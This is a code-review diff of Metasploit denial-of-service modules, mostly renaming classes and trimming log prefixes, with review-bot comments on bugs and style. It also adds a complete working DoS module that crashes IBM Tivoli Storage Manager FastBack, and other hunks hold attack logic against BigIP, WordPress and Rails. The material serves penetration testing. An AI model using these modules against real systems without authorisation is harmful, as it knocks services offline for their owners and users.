diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 4855af2930..92914f2613 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 0974305d95..ad3d15abb9 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb index f13ad89ffe..ebb8d96f9f 100644 --- a/modules/auxiliary/dos/http/canon_wireless_printer.rb +++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 6f13cb2ca0..fb2e4c8ca7 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index e935e91cc2..9eb5b5a507 100644 
--- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) @@ -56,27 +55,27 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi('method' => 'GET', 'uri' => '/') unless res - print_error("#{peer} - No answer from the BigIP server") + print_error("No answer from the BigIP server") return end # Simple test based on HTTP Server header to detect BigIP virtual server server = res.headers['Server'] unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack - print_error("#{peer} - BigIP virtual server was not detected. Please check options") + print_error("BigIP virtual server was not detected. Please check options") return end - print_status("#{peer} - Starting DoS attack") + print_status("Starting DoS attack") # Start attack limit.times do |step| if step % 100 == 0 - print_status("#{peer} - #{step * 100 / limit}% accomplished...") + print_status("#{step * 100 / limit}% accomplished...") end res = send_request_cgi('method' => 'GET', 'uri' => '/') if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/ - print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.") + print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.") return end end 
@@ -84,18 +83,18 @@ class Metasploit3 < Msf::Auxiliary # Check if attack has failed res = send_request_cgi('method' => 'GET', 'uri' => uri) if res.headers['Location'] =~ /\/my.policy/ - print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT") + print_error("DoS attack failed. Try to increase the RLIMIT") else - print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result") + print_status("Result is undefined. Try to manually determine DoS attack result") end rescue ::Errno::ECONNRESET - print_error("#{peer} - The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") + print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") rescue ::Rex::ConnectionRefused - print_error("#{peer} - Unable to connect to BigIP") + print_error("Unable to connect to BigIP") rescue ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect to BigIP. Please check options") + print_error("Unable to connect to BigIP. Please check options") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/dos/http/gzip_bomb_dos.rb b/modules/auxiliary/dos/http/gzip_bomb_dos.rb index a96f05e1b4..ecd3a5dd0e 100644 --- a/modules/auxiliary/dos/http/gzip_bomb_dos.rb +++ b/modules/auxiliary/dos/http/gzip_bomb_dos.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' require 'stringio' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index 59d7e7370a..bc61b28bfb 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb 
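Review bot: The post-attack check `if res.headers['Location'] =~ /\/my.policy/` dereferences `res` with no nil guard, although the previous hunk of this file guards the same call with `unless res` and `if res && res.headers['Location']`. If the final `send_request_cgi` gets no answer, this presumably raises NoMethodError, which none of the rescue clauses below it cover, so the operator sees a stack trace instead of the "DoS attack failed" or "Result is undefined" message. I would write `if res && res.headers['Location'] =~ /\/my\.policy/`, which also escapes the dot that currently matches any character. The method starts above this hunk.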
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/monkey_headers.rb b/modules/auxiliary/dos/http/monkey_headers.rb index 2f6c097029..7915eec2f4 100644 --- a/modules/auxiliary/dos/http/monkey_headers.rb +++ b/modules/auxiliary/dos/http/monkey_headers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index b69b8872f1..fa089a17be 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Watch out, dos all the things include Msf::Auxiliary::Scanner @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if check_host(ip) == Exploit::CheckCode::Vulnerable dos_host(ip) else - print_status("#{peer} - Probably not vulnerable, will not dos it.") + print_status("Probably not vulnerable, will not dos it.") end end @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.body.length - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call 
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::EPIPE, ::Timeout::Error # Same exceptions the HttpClient mixin catches end - print_status("#{peer} - DOS request sent") + print_status("DOS request sent") end def potential_static_files_uris diff --git a/modules/auxiliary/dos/http/nodejs_pipelining.rb b/modules/auxiliary/dos/http/nodejs_pipelining.rb index 9f3181a0aa..b07ff1741c 100644 --- a/modules/auxiliary/dos/http/nodejs_pipelining.rb +++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index efb942abe9..a0cfd4437b 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Triggering a heap overflow to cause DoS...") + print_status("Triggering a heap overflow to cause DoS...") begin res = send_request_cgi( 
@@ -57,16 +57,16 @@ class Metasploit3 < Msf::Auxiliary 'data' => message }) rescue ::Errno::ECONNRESET - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") return end if res - print_error("#{peer} - NFR Agent didn't die, it still answers...") + print_error("NFR Agent didn't die, it still answers...") return end - print_good("#{peer} - NFR Agent didn't answer, DoS seems successful") + print_good("NFR Agent didn't answer, DoS seems successful") end end diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb index 92c685a1aa..92cccd67d7 100644 --- a/modules/auxiliary/dos/http/rails_action_view.rb +++ b/modules/auxiliary/dos/http/rails_action_view.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 40123ce208..2dc123ecea 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -75,11 +75,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status "#{peer} - Using digit pattern of #{digit_pattern} taken to #{multiplier} places" + print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places" sploit = '[' sploit << evil_float_string sploit << ']' - print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" + print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}" target_available = true begin 
@@ -91,19 +91,19 @@ class Metasploit3 < Msf::Auxiliary 'data' => sploit }) rescue ::Rex::ConnectionRefused - print_error "#{peer} - Unable to connect. (Connection refused)" + print_error "Unable to connect. (Connection refused)" target_available = false rescue ::Rex::HostUnreachable - print_error "#{peer} - Unable to connect. (Host unreachable)" + print_error "Unable to connect. (Host unreachable)" target_available = false rescue ::Rex::ConnectionTimeout - print_error "#{peer} - Unable to connect. (Timeout)" + print_error "Unable to connect. (Timeout)" target_available = false end return unless target_available - print_status "#{peer} - Checking availability" + print_status "Checking availability" begin res = send_request_cgi({ 'method' => verb, @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Auxiliary target_available = false end rescue ::Rex::ConnectionError, Errno::ECONNRESET - print_good "#{peer} - DoS appears successful (Host unreachable)" + print_good "DoS appears successful (Host unreachable)" target_available = false end return unless target_available - print_status "#{peer} - Target is still responsive, DoS was unsuccessful." + print_status "Target is still responsive, DoS was unsuccessful." end end diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index e90f6bec2d..0db48a5fcb 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok. diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 4329b358db..38dc4e8948 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 258f134c4b..70e9ec24cc 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary def user_exists(user) exists = wordpress_user_exists?(user) if exists - print_good("#{peer} - Username \"#{username}\" is valid") + print_good("Username \"#{username}\" is valid") report_cred( ip: rhost, port: rport, @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary return true else - print_error("#{peer} - \"#{user}\" is not a valid username") + print_error("\"#{user}\" is not a valid username") return false end end @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary def run if wordpress_and_online? if validate_user - print_status("#{peer} - Checking if user \"#{username}\" exists...") + print_status("Checking if user \"#{username}\" exists...") unless user_exists(username) print_error('Aborting operation - a valid username must be specified') return @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary starting_thread = 1 while starting_thread < rlimit do ubound = [rlimit - (starting_thread - 1), thread_count].min - print_status("#{peer} - Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") + print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") threads = [] 1.upto(ubound) do |i| 
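Review bot: In `user_exists(user)` of wordpress_long_password_dos.rb the success message interpolates `username` while the lookup and the failure message use the `user` argument. The two are the same value only as long as every caller passes `username`, so the success line can report a different name from the one that was checked. For consistency the line should read `print_good("Username \"#{user}\" is valid")`. The `report_cred` call that follows is cut by the hunk boundary, so whether it has the same mismatch cannot be checked from here.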
@@ -133,20 +133,20 @@ class Metasploit3 < Msf::Auxiliary begin wordpress_login(username, Rex::Text.rand_text_alpha(plength), timeout) rescue => e - print_error("#{peer} - Timed out during request #{(starting_thread - 1) + i}") + print_error("Timed out during request #{(starting_thread - 1) + i}") end end end threads.each(&:join) - print_good("#{peer} - Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") + print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end if wordpress_and_online? - print_error("#{peer} - FAILED: #{target_uri} appears to still be online") + print_error("FAILED: #{target_uri} appears to still be online") else - print_good("#{peer} - SUCCESS: #{target_uri} appears to be down") + print_good("SUCCESS: #{target_uri} appears to be down") end else print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress") diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 489458a65e..3bced8e4a6 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary # try out the available memory in steps # apache will return a server error if the limit is reached while memory_to_use < 1024 - vprint_status("#{peer} - trying memory limit #{memory_to_use}MB") + vprint_status("trying memory limit #{memory_to_use}MB") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, 
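Review bot: The `rescue => e` inside the request thread catches every StandardError and reports it as "Timed out during request N", while `e` itself is never used. A refused connection, or a plain bug inside `wordpress_login`, would be logged as a timeout, which makes the final "appears to be down" verdict hard to trust. Either narrow the rescue to the timeout classes the helper actually raises (not visible in this hunk) or print what was caught: `print_error("Request #{(starting_thread - 1) + i} failed: #{e.class} #{e.message}")`.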
@@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary # low timeout because the server error is returned immediately res = send_request_cgi(opts, timeout = 3) rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") break end if res && res.code == 500 # limit reached, return last limit last_limit = memory_to_use - fingerprint_step - vprint_status("#{peer} - got an error - using limit #{last_limit}MB") + vprint_status("got an error - using limit #{last_limit}MB") return last_limit else memory_to_use += fingerprint_step @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary end # no limit can be determined - print_warning("#{peer} - can not determine limit, will use default of #{default_limit}") + print_warning("can not determine limit, will use default of #{default_limit}") return default_limit end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary } space_to_fill = size_bytes - empty_xml.size - vprint_status("#{peer} - max XML space to fill: #{space_to_fill} bytes") + vprint_status("max XML space to fill: #{space_to_fill} bytes") payload = "&#{entity};" * (space_to_fill / 6) entity_value_length = space_to_fill - payload.length @@ -148,15 +148,15 @@ class Metasploit3 < Msf::Auxiliary def run # get the max size - print_status("#{peer} - trying to fingerprint the maximum memory we could use") + print_status("trying to fingerprint the maximum memory we could use") size = fingerprint - print_status("#{peer} - using #{size}MB as memory limit") + print_status("using #{size}MB as memory limit") # only generate once xml = generate_xml(size) for x in 1..rlimit - print_status("#{peer} - sending request ##{x}...") + print_status("sending request ##{x}...") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, 
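Review bot: A style point in the fingerprint hunk of wordpress_xmlrpc_dos.rb: `send_request_cgi(opts, timeout = 3)` is not a keyword argument. It assigns a throwaway local named `timeout` and passes 3 positionally, which reads as though the name matters to the callee. `res = send_request_cgi(opts, 3)` says the same thing without the stray local. The `for x in 1..rlimit` loop in the `run` hunk would likewise be more idiomatic as `1.upto(rlimit) do |x|`. Both methods extend past their hunks.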
@@ -169,7 +169,7 @@ class Metasploit3 < Msf::Auxiliary c.send_request(r) # Don't wait for a response, can take very long rescue ::Rex::ConnectionError => exception - print_error("#{peer} - unable to connect: '#{exception.message}'") + print_error("unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 4cf177b852..2de44aae5d 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index e21ccb27b4..2c83a27686 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index c6f8a24995..faf1cceed4 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos 
@@ -81,37 +81,37 @@ class Metasploit3 < Msf::Auxiliary def run # inform user of action currently selected - print_status("#{peer} - Action: #{action.name} selected") + print_status("Action: #{action.name} selected") # CHECK action if action.name == 'CHECK' - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") if check_user - print_good("#{peer} - User online") + print_good("User online") else - print_status("#{peer} - User offline") + print_status("User offline") end return end # DOS action - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") check_result = check_user if check_result == false - print_error("#{peer} - User is already offline... Exiting...") + print_error("User is already offline... Exiting...") return end # only proceed if action is DOS the target user is # online or the CHECKUSER option has been disabled - print_status("#{peer} - Targeting user: #{@sipuri}...") + print_status("Targeting user: #{@sipuri}...") dos_result = dos_user if dos_result - print_good("#{peer} - User is offline, DoS was successful") + print_good("User is offline, DoS was successful") else - print_error("#{peer} - User is still online") + print_error("User is still online") end end 
@@ -122,22 +122,22 @@ class Metasploit3 < Msf::Auxiliary res = send_msg(msg) if res.nil? - vprint_good("#{peer} - User #{@sipuri} is no responding") + vprint_good("User #{@sipuri} is no responding") return true elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - DoS packet successful. Response received (430 Flow Failed)") - vprint_good("#{peer} - User #{@sipuri} is no longer responding") + vprint_good("DoS packet successful. Response received (430 Flow Failed)") + vprint_good("User #{@sipuri} is no longer responding") return true elsif res =~ /404 Not Found/i - vprint_error("#{peer} - DoS packet appears successful. Response received (404 Not Found)") - vprint_status("#{peer} - User appears to be currently offline or not in a Sametime video session") + vprint_error("DoS packet appears successful. Response received (404 Not Found)") + vprint_status("User appears to be currently offline or not in a Sametime video session") return true elsif res =~ /200 OK/i vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)") vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer") return false else - vprint_status("#{peer} - Unexpected response") + vprint_status("Unexpected response") return true end end 
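Review bot: The `200 OK` branch still calls `vrint_error("#{peer} - ...")` and `vrint_status("#{peer} - ...")`, which look like misspellings of `vprint_error` and `vprint_status`; that is probably why the prefix cleanup skipped these two lines. Unless those names are defined elsewhere, a 200 response raises NoMethodError instead of returning false, so `run` never reaches its "User is still online" report. Suggested first line: `vprint_error("DoS packet unsuccessful. Response received (200)")`, with the same rename and prefix removal on the `vrint_status` line. The first branch's message "is no responding" should also read "is not responding". The method begins above the hunk.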
@@ -150,26 +150,26 @@ class Metasploit3 < Msf::Auxiliary # check response for current user status - common return codes if res.nil? - vprint_error("#{peer} - No response") + vprint_error("No response") return false elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - User #{@sipuri} is no longer responding (already DoS'd?)") + vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)") return false elsif res =~ /404 Not Found/i - vprint_error("#{peer} - User #{@sipuri} is currently offline or not in a Sametime video session") + vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session") return false elsif res =~ /200 OK/i - vprint_good("#{peer} - User #{@sipuri} is online") + vprint_good("User #{@sipuri} is online") return true else - vprint_error("#{peer} - Unknown server response") + vprint_error("Unknown server response") return false end end def create_message(length) # create SIP MESSAGE of specified length - vprint_status("#{peer} - Creating SIP MESSAGE packet #{length} bytes long") + vprint_status("Creating SIP MESSAGE packet #{length} bytes long") source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1) source_host = Rex::Socket.source_address(datastore['RHOST']) @@ -215,13 +215,13 @@ class Metasploit3 < Msf::Auxiliary end return res rescue ::Rex::ConnectionRefused - print_status("#{peer} - Unable to connect") + print_status("Unable to connect") return nil rescue ::Errno::ECONNRESET - print_status("#{peer} - DoS packet successful, host not responding.") + print_status("DoS packet successful, host not responding.") return nil rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_status("#{peer} - Couldn't connect") + print_status("Couldn't connect") return nil ensure # disconnect socket if still open diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb new file mode 100644 index 0000000000..72784a7589 --- /dev/null 
+++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -0,0 +1,82 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Description' => %q{ + This module exploits a denial of service condition present in IBM Tivoli Storage Manager + FastBack Server when dealing with packets triggering the opcode 0x534 handler. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'William Webb ', # Metasploit + ], + 'References' => + [ + ['EDB', '38979'], + ['OSVDB', '132307'] + ], + 'DisclosureDate' => "Dec 15 2015", + )) + + register_options( + [ + Opt::RPORT(11460) + ], self.class) + end + + def tv_pkt(opcode, p1="", p2="", p3="") + buf = Rex::Text.rand_text_alpha(0x0C) + buf += [opcode].pack("V") + buf += [0x00].pack("V") + buf += [p1.length].pack("V") + buf += [p1.length].pack("V") + buf += [p2.length].pack("V") + buf += [p1.length + p2.length].pack("V") + buf += [p3.length].pack("V") + + buf += Rex::Text.rand_text_alpha(0x08) + + buf += p1 + buf += p2 + buf += p3 + + pkt = [buf.length].pack("N") + pkt << buf + + return pkt + end + + def run + target_opcode = 0x534 + connect + print_status("Connected to: #{rhost} port: #{rport}") + print_status("Sending malicious packet") + + p = tv_pkt(target_opcode, + "File: %s 
From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + Rex::Text.rand_text_alpha(0x60), + Rex::Text.rand_text_alpha(0x60) + ) + + sock.put(p) + print_status("Packet sent!") + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex + print_status("Exploit failed: #{ex.class} #{ex.message}") + elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}") + ensure + disconnect + end +end diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb index f120cc3aa2..30a34e6db2 100644 --- a/modules/auxiliary/dos/misc/memcached.rb +++ b/modules/auxiliary/dos/misc/memcached.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 73a64cd658..cabca95f30 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 949a673013..9d96f4b83c 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index ec88b8823a..82987c5a44 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb 
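Review bot: In the new ibm_tsm_dos.rb, `tv_pkt` has no comment describing the header it builds, and the length fields are not self-explanatory: `p1.length` is packed twice and the fourth field is `p1.length + p2.length`. A reader cannot tell whether these are size/offset pairs or a copy-paste slip. A short comment above the method would settle it, for example `# 12 random bytes, opcode, zero, five 32-bit LE length/offset fields, 8 random bytes, then p1..p3; the whole buffer is prefixed with its big-endian length`, with a note on what each of the five fields means to the server. Separately, the rescue path in `run` reports a failure through `print_status`; `print_error("Exploit failed: #{ex.class} #{ex.message}")` would match how the other modules in this diff report connection errors.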
